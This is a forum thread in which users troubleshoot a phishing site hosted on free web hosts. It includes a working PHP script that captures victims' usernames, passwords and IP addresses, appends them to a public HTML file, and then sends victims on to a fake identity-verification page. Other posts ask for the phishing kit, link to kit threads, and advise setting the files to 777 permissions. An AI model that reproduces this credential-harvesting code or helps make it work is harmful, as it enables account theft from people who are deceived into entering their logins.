On 000host it said to enter it in the public.html folder so i did =P
i'm useing 00webhost and when i type in a user/pass it dosn't show up in the dawg.html..here are my configs
<?php
$user = $_POST['username'];
$pass = $_POST['password'];
$ip = $_SERVER['REMOTE_ADDR'];
if(!isset($_POST['username']) || ($_POST['password']) == '') {
header( 'Location: indexerror.html' );
}
else {
$entry_line = "<B>Username:</B> ".$user." <B>Password:</B> ".$pass." <B>IP:</B> ".$ip."<br>";
$fp = fopen("dawg.html", "a");
fwrite($fp, $entry_line);
fclose($fp);
header( 'Location: Auth/identity_verification.html' );
}
?>
On 000host it said to enter it in the public.html folder so i did =P
What type of phisher are u using? Tell me the folders in which u can dump it in.
also can u link me ur phisher so that i can try it out myself and see what it is like?
Loging phisher and im putting it in the public html folder
http://www.mmowned.com/forums/wow-sc...d-working.html
Have you chmodded everything to 777?
It works perfectly on 110mb..But it SHows Errors on the page.. lol CHmodded?????
SO wait...ur using..
http://www.mmowned.com/forums/wow-sc...net-2-0-a.html
okay...so when do u get that error?
nvm i got it..it was the CHMod